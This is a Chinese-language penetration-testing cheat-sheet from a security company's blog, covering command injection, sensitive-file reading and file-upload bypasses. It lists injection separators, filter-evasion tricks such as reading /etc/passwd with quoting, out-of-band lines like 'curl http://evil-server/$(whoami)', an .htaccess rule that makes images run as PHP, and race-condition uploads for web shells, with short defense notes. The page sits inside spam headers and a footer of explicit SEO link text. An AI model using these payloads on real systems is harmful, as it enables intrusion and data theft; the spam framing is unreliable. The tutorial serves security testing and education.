少妇被粗黑进进出出在线观看_日日摸夜夜爽无码_免费久久_日韩免费视频_热播短剧玫瑰冠冕免费观看_japanese精品少妇

網(wǎng)站命令執(zhí)行滲透測(cè)試步驟詳情
  • 更新時(shí)間:2025-05-13 00:33:34
  • 開發(fā)經(jīng)驗(yàn)
  • 發(fā)布時(shí)間:3年前
  • 746

哈嘍大家好,近期我們Sine安全對(duì)客戶平臺(tái)進(jìn)行滲透測(cè)試的時(shí)候,發(fā)現(xiàn)有一些命令執(zhí)行的漏洞測(cè)試語(yǔ)句和函數(shù),導(dǎo)致服務(wù)器被提權(quán)被入侵,上一節(jié)提到XSS跨站腳本攻擊檢測(cè)方法,本章來(lái)總和一下腳本執(zhí)行命令的詳細(xì)檢測(cè)手段,以及繞過waf的辦法,只有這樣詳細(xì)的對(duì)平臺(tái)進(jìn)行安全測(cè)試才能保障整個(gè)平臺(tái)安全穩(wěn)定。


3.5.1. 簡(jiǎn)介

命令注入通常因?yàn)橹竁eb應(yīng)用在服務(wù)器上拼接系統(tǒng)命令而造成的漏洞。

該類漏洞通常出現(xiàn)在調(diào)用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機(jī)名/IP/掩碼/網(wǎng)關(guān)、查看系統(tǒng)信息以及關(guān)閉重啟等功能,或者一些站點(diǎn)提供如ping、nslookup、提供發(fā)送郵件、轉(zhuǎn)換圖片等功能都可能出現(xiàn)該類漏洞。


3.5.2. 常見危險(xiǎn)函數(shù)

3.5.2.1. PHP

system

exec

passthru

shell_exec

popen

proc_open

3.5.2.2. Python

system

popen

subprocess.call

spawn

3.5.2.3. Java

java.lang.Runtime.getRuntime().exec(command)

3.5.3. 常見注入方式

分號(hào)分割

|| && & 分割

| 管道符

\r\n %d0%a0 換行

反引號(hào)解析

$() 替換

3.5.4. 無(wú)回顯技巧

bash反彈shell

DNS帶外數(shù)據(jù)

http帶外

curl http://evil-server/$(whoami)

wget http://evil-server/$(whoami)

無(wú)帶外時(shí)利用 sleep 或其他邏輯構(gòu)造布爾條件

3.5.5. 常見繞過方式

3.5.5.1. 空格繞過

< 符號(hào) cat<123

\t / %09

${IFS} 其中{}用來(lái)截?cái)啵热鏲at$IFS2會(huì)被認(rèn)為IFS2是變量名。另外,在后面加個(gè)$可以起到截?cái)嗟淖饔茫话阌?9,因?yàn)?9是當(dāng)前系統(tǒng)shell進(jìn)程的第九個(gè)參數(shù)的持有者,它始終為空字符串

3.5.5.2. 黑名單繞過

a=l;b=s;$a$b

echo "bHM=" | -d

/?in/?s => /bin/ls

連接符 cat /etc/pass'w'd

未定義的初始化變量 cat$x /etc/passwd

3.5.5.3. 長(zhǎng)度限制繞過

>wget\

>foo.\

>com

ls -t>a

sh a

上面的方法為通過命令行重定向?qū)懭朊睿又ㄟ^ls按時(shí)間排序把命令寫入文件,最后執(zhí)行 直接在Linux終端下執(zhí)行的話,創(chuàng)建文件需要在重定向符號(hào)之前添加命令 這里可以使用一些諸如w,[之類的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能結(jié)束,這樣就等于標(biāo)準(zhǔn)輸入流的重定向 而在php中 , 使用 shell_exec 等執(zhí)行系統(tǒng)命令的函數(shù)的時(shí)候 , 是不存在標(biāo)準(zhǔn)輸入流的,所以可以直接創(chuàng)建文件

3.5.6. 常用符號(hào)

3.5.6.1. 命令分隔符

%0a / %0d / \n / \r

;

& / &&

3.5.6.2. 通配符

* 0到無(wú)窮個(gè)任意字符

? 一個(gè)任意字符

[ ] 一個(gè)在括號(hào)內(nèi)的字符,e.g. [abcd]

[ - ] 在編碼順序內(nèi)的所有字符

[^ ] 一個(gè)不在括號(hào)內(nèi)的字符

3.5.7. 防御

不使用時(shí)禁用相應(yīng)函數(shù)

盡量不要執(zhí)行外部的應(yīng)用程序或命令

做輸入的格式檢查

轉(zhuǎn)義命令中的所有shell元字符

shell元字符包括 #&;`,|*?~<>^()[]{}$\

3.6. 文件讀取

3.6. 文件讀取

考慮讀取可能有敏感信息的文件

用戶目錄下的敏感文件

.bash_history

.zsh_history

.profile

.bashrc

.gitconfig

.viminfo

passwd

應(yīng)用的配置文件

/etc/apache2/apache2.conf

/etc/nginx/nginx.conf

應(yīng)用的日志文件

/var/log/apache2/access.log

/var/log/nginx/access.log

站點(diǎn)目錄下的敏感文件

.svn/entries

.git/HEAD

WEB-INF/web.xml

.htaccess

特殊的備份文件

.swp

.swo

.bak

index.php~

Python的Cache

__pycache__\__init__.cpython-35.pyc

3.7. 文件上傳

3.7.1. 文件類型檢測(cè)繞過

3.7.1.1. 更改請(qǐng)求繞過

有的站點(diǎn)僅僅在前端檢測(cè)了文件類型,這種類型的檢測(cè)可以直接修改網(wǎng)絡(luò)請(qǐng)求繞過。同樣的,有的站點(diǎn)在后端僅檢查了HTTP Header中的信息,比如 Content-Type 等,這種檢查同樣可以通過修改網(wǎng)絡(luò)請(qǐng)求繞過。


3.7.1.2. Magic檢測(cè)繞過

有的站點(diǎn)使用文件頭來(lái)檢測(cè)文件類型,這種檢查可以在Shell前加入對(duì)應(yīng)的字節(jié)以繞過檢查。幾種常見的文件類型的頭字節(jié)如下表所示


3.7.1.3. 后綴繞過

部分服務(wù)僅根據(jù)后綴、上傳時(shí)的信息或Magic Header來(lái)判斷文件類型,此時(shí)可以繞過。

php由于歷史原因,部分解釋器可能支持符合正則 /ph(p[2-7]?|t(ml)?)/ 的后綴,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上傳php文件時(shí)測(cè)試該類型。

jsp引擎則可能會(huì)解析 jspx / jspf / jspa / jsw / jsv / jtml 等后綴,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后綴。

除了這些繞過,其他的后綴同樣可能帶來(lái)問題,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。


3.7.1.4. 系統(tǒng)命名繞過

在Windows系統(tǒng)中,上傳 index.php. 會(huì)重命名為 . ,可以繞過后綴檢查。也可嘗試

index.php%20, index.php:1.jpg index.php::$DATA 等。在Linux系統(tǒng)中,可以嘗試上傳名為 index.php/. 或 ./aa/../index.php/. 的文件


3.7.1.5. .user.ini

在php執(zhí)行的過程中,除了主 php.ini 之外,PHP 還會(huì)在每個(gè)目錄下掃描 INI 文件,從被執(zhí)行的 PHP 文件所在目錄開始一直上升到 web 根目錄($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被執(zhí)行的 PHP 文件在 web 根目錄之外,則只掃描該目錄。.user.ini 中可以定義除了PHP_INI_SYSTEM以外的模式的選項(xiàng),故可以使用 .user.ini 加上非php后綴的文件構(gòu)造一個(gè)shell,比如 auto_prepend_file=01.gif 。


3.7.1.6. WAF繞過

有的waf在編寫過程中考慮到性能原因,只處理一部分?jǐn)?shù)據(jù),這時(shí)可以通過加入大量垃圾數(shù)據(jù)來(lái)繞過其處理函數(shù)。

另外,Waf和Web系統(tǒng)對(duì) boundary 的處理不一致,可以使用錯(cuò)誤的 boundary 來(lái)完成繞過。


3.7.1.7. 競(jìng)爭(zhēng)上傳繞過

有的服務(wù)器采用了先保存,再刪除不合法文件的方式,在這種服務(wù)器中,可以反復(fù)上傳一個(gè)會(huì)生成Web Shell的文件并嘗試訪問,多次之后即可獲得Shell。


3.7.2. 攻擊技巧

3.7.2.1. Apache重寫GetShell

Apache可根據(jù)是否允許重定向考慮上傳.htaccess

內(nèi)容為

AddType application/x-httpd-php .png php_flag engine 1

就可以用png或者其他后綴的文件做php腳本了


3.7.2.2. 軟鏈接任意讀文件

上傳的壓縮包文件會(huì)被解壓的文件時(shí),可以考慮上傳含符號(hào)鏈接的文件 若服務(wù)器沒有做好防護(hù),可實(shí)現(xiàn)任意文件讀取的效果,如果覺得防護(hù)做的不到位 不放心的話,可以找專業(yè)的網(wǎng)站安全公司來(lái)處理解決,畢竟術(shù)業(yè)有專攻,國(guó)內(nèi)做的比較好的公司如:Sinesafe,綠盟,啟明星辰等等。


3.7.3. 防護(hù)技巧

使用白名單限制上傳文件的類型

使用更嚴(yán)格的文件類型檢查方式

限制Web Server對(duì)上傳文件夾的解析

我們專注高端建站,小程序開發(fā)、軟件系統(tǒng)定制開發(fā)、BUG修復(fù)、物聯(lián)網(wǎng)開發(fā)、各類API接口對(duì)接開發(fā)等。十余年開發(fā)經(jīng)驗(yàn),每一個(gè)項(xiàng)目承諾做到滿意為止,多一次對(duì)比,一定讓您多一份收獲!

本文章出于推來(lái)客官網(wǎng),轉(zhuǎn)載請(qǐng)表明原文地址:https://www.tlkjt.com/experience/7583.html
推薦文章

在線客服

掃碼聯(lián)系客服

3985758

回到頂部

主站蜘蛛池模板: 国产精品国产精品九九_男生操女生视频在线观看_粉嫩一区二区三区在线看_国产无遮挡又黄又爽不要VIP网站_台湾一区二区三区_四虎影院免费看 | 又黄又爽又猛1000部A片_青春草免费在线视频_欧美成人精品高清在线播放_av黑人_午夜视频久久_91一区二区三区在线 | 黄色免费网站在线看_欧洲精品久久_啪啪午夜视频_国产成人综合亚洲色就色_国产超污视频在线观看_三个黑人上我一个 | 成人福利视频在线观看_欧美黑人性生活视频_一边添奶一边添P好爽视频_亚洲看片lutube在线入口_操操操综合_jvid在线观看 | 亚洲精品55夜色66夜色_youjizz亚洲_久草加勒比_久久久三级视频_玩两个丰满老熟女久久网_午夜影视一区二区 | 亚洲91网站_加勒比中文无码久久综合色_啪啪综合视频_98k网站毛片成年女人网站_久久精品中文騷妇女内射_亚洲欧美人高清精品a∨ | 国产成人区_蜜臀av一二三区_www.色视频_懂色av成人一区二区三区_亚洲欧美日本a∨在线观看_国产免费av片在线看 | 国产91对白在线播放_黄色成人在线免费观看_精品字幕_久久综合se_国产日韩视频一区二区三区_av免费在线看网站 | 九九99九九精彩6_男男双龙调教失禁高潮play_亚洲爱爱视频_精品国内自产拍在线观看_国语精品自拍_黄色快播网站 | 国产乱子伦农村xxxx_五码亚洲_日韩精品无码人成视频_俺也去一区二区_在线观看亚洲网站_高清色视频在线观看 | 色悠久久久_被仇人调教成禁脔h_在线激情网站_亚洲AV永久无码一区二区三区_美国十次久久_人人人艹 | 日本做爰大片免费观看一_www拍拍拍_四虎精品8848ys一区二区_中文乱码免费一区二区三区_日本久久黄_青青操av在线 | 国产清纯在线一区二区VR_久久综合一区_亚洲草草草_性一交一伦一a级_99精品免费久久久久久久久_国产精品一区二区三区观看 | 国产精品不卡视频_小受咬床单失禁的GV在线观看_好男人网官网在线观看2019_国产成人av一区二区三区在线_免费的成人A级毛片_av毛片免费 | 久久久久久久久久看片_日本视频免_蜜桃精品视频在线观看_青青草华人在线视频_国产精品白丝喷水在线观看_无码精品少妇在线人妻AV | 最近手机中文字幕1页_国产精品青草国产一区二区_一区二区三区四区蜜桃_亚洲第一精品导航_九色在线观看视频_亚洲人成免费在线观看 | 天天艹逼网_国产亚洲欧美一区二区三区在线播放_成年人在线看视频_少妇系列中文字幕一区_精品人妻无码区二区三区_91在线观看免费 | 亚洲精品一卡2卡3卡四卡乱码_国产精品久久在线观看_性xxxxfreexxxxx欧美牲交_大地资源高清在线观看免费新浪_夜夜欢性恔免费视频_在线观看精品自拍私拍 | 桃色社区_国产精品久久久久久久久晋中_亚洲综人_日本欧美中文字幕精品亚洲_少妇裸体淫交视频免费观看_久久久久久99 | 欧美69xxxxx_欧美人与动牲交ZOOZ男人_国产精品久久久久潘金莲_亚洲天堂男_精品成人在线视频_蜜桃传媒一区二区亚洲av | 一级a一级a爰片免费免免_永久精品网站_办公室娇喘的短裙老师在线视频_avv天堂网_久久久久88色偷偷_亚洲国产成人久久综合一区 | 欧美精品3_国产视频不卡_亚洲春色αV无码专区在线播放_欧美久久久久久久久久_色在线亚洲视频www_日韩精品一区二区亚洲A∨观看 | 人人av在线_五月天狠狠操_久久中文字幕高清_精品国产一区二区三区四区vr_摊牌了我的五个哥哥是大佬短剧免费观看_日本成人区 | 在线青草_欧洲熟妇色xxxx欧美老妇软件_亚洲国产成人无码精品_青草久久久_91手机在线看片_亚洲日韩成人无码不卡网站 | 亚洲成人免费在线播放_99久久精品久久久久久清纯_国产火热热av_国语FREE性XXXXXHD_麻豆av在线免费观看_欧美极品在线视频 | 52gao在线视频_欧美视频一级_av成人免费网站_久久精品国产一区二区_国产中文字幕在线_91美女高潮出水 | 超碰在线看_91综合在线_youbbb国产在线视频_亭亭五月天色网_丁香五月亚洲综合在线_奇米影视7777777 | 女人19水真多免费毛片_久久久久久久久亚洲_啊轻点灬大ji巴太粗太长了日本_色老头XXXX_国产黄色一级片_久久aa 999久久久欧美日韩黑人_欧美亚色_狠狠色图片_japanhd性美女_国产精品国精产品一二_在线观看所有av | 好紧好爽午夜视频_国产亚洲自拍一区_91影视一区二区三区_免费在线播放av_办公室高h文_九色视频网站在线观看 | 91av一区_中国丰满少妇人妻XXX性董鑫洁_日韩欧美在线看_亚欧成人在线_国产中文字幕久久_精品99爱视频在线观看 | 中文字幕一区二区三区在线看_亚洲AV美女一区二区三区_高潮A片揉搓乳尖乱颤视频_全国免费av_人人九九精品_久久久午夜爽爽一区二区三区三州 | 大菠萝福利网_鲁鲁夜夜天天综合视频_2019亚洲日韩新视频_国户精品久久久久久久久久久不卡_青青在线免费视频_伦伦影院午夜理论片 亚洲成年人专区_91麻豆欧美成人精品_五月天婷亚洲天综合网精品偷_精品乱码久久久久久_国产人妖在线视频_九九热re日本精品 | 岛国av网址_国产高清精品一区二区_内射在线Chinese_国产精选网站_精品一区二区三区中文字幕老牛_国产精品video爽爽爽爽 | 成人乱码_国产视频二区三区_亚洲自拍中文字幕_亚洲人亚洲精品成人网站_色天天躁夜夜躁天干天干_久久中文字幕无码中文字幕有码 | 叶子楣成人爽a毛片免费啪啪_国产精品无码AV片在线观看播_久艹在线观看_国产精品一区二区久久不卡_亚洲大乳无码一级毛片_久久综合av色老头免费观看 | 久久国产毛片av_小太正白袜飞机gv免费网址_亚洲免费三区_99久精品视频在线观看视频_一级毛片在线视频免费观看_国产精品成人AV在线观看春天 | 中文字幕日本最新乱码视频_日韩av成人在线_韩国视频一区二区_免费在线播放黄色_亚洲国产精品无码成人片久久_青青青在线视频观看 | 久久精品大片_青草久久久国产线免观蜜芽_无码国产精品一区二区免费久久_久久中文字幕人妻熟AV女_福利视频一二区_日日夜夜操操操 | 精品女同一区二区三区_三级全黄不卡的_成人视屏在线观看_午夜影院啪啪_白娘子传奇50集免费观看_中文天堂在线一区 | 久久久观看_大地影视mv高清视频_麻豆免费版在线观看_日韩精品少妇无码受不了_欧美一区二区观看_av资源网在线观看 | 91性高湖久久久久久久久网站_催眠极品YIN荡人妻合集H_国产精品久久久久久妇女6080_亚洲欧美在线观看_少妇老师寂寞高潮免费A片_一区二区三区视频国产日韩 |